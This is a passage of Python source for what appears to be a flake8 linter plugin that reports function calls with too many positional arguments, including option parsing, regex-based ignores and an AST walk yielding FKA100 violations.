        )

    @classmethod
    def parse_options(cls, options: Namespace) -> None:
        """Compile the ignore regexes and build the trie of callables
        detected as positional-only by module inspection."""
        cls._max_pos_args = options.max_positional_arguments
        ignore_patterns = (options.ignore_function_pattern, options.ignore_function_pattern_extend)
        # filter(None, ...) drops the extension pattern when it is unset.
        cls._ignore_patterns = tuple(map(re.compile, filter(None, ignore_patterns)))
        qualifier_option = options.inspect_qualifier_option
        # Import each configured module and collect its positional-only
        # callables into one trie for O(len(name)) membership checks.
        cls._ignore_trie = Trie(
            chain.from_iterable(
                map(
                    lambda module_name: util.list_pos_only_callables(
                        m=importlib.import_module(module_name),
                        parent_module_qualifier=module_name,
                        poa_threshold=cls._max_pos_args,
                        qualifier_option=qualifier_option,
                    ),
                    chain(options.inspect_module, options.inspect_module_extend),
                )
            )
        )

    def run(self) -> Iterable[Tuple[int, int, str, Type['Checker']]]:
        """Yield a FKA100 violation for each call with too many positional
        arguments (position, message, checker type)."""
        for node in ast.walk(self._tree):
            # Skip non-calls and calls below the threshold.  NOTE(review):
            # calls with exactly _max_pos_args positional arguments ARE
            # flagged (`< threshold` passes through) -- confirm whether the
            # option help text ("how many are allowed") matches this.
            if not isinstance(node, ast.Call) or len(node.args) < self._max_pos_args:
                continue
            invocation_line = util.get_invocation_line(node)
            # ignored because of patterns
            if any(map(lambda p: p.search(invocation_line), self._ignore_patterns)):
                continue
            # ignored because of inspection
            if invocation_line in self._ignore_trie:
                continue
            message = self.MESSAGE_TEMPLATE.format(function_name=invocation_line, number_of_args=len(node.args))
            yield node.lineno, node.col_offset, message, type(self)
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.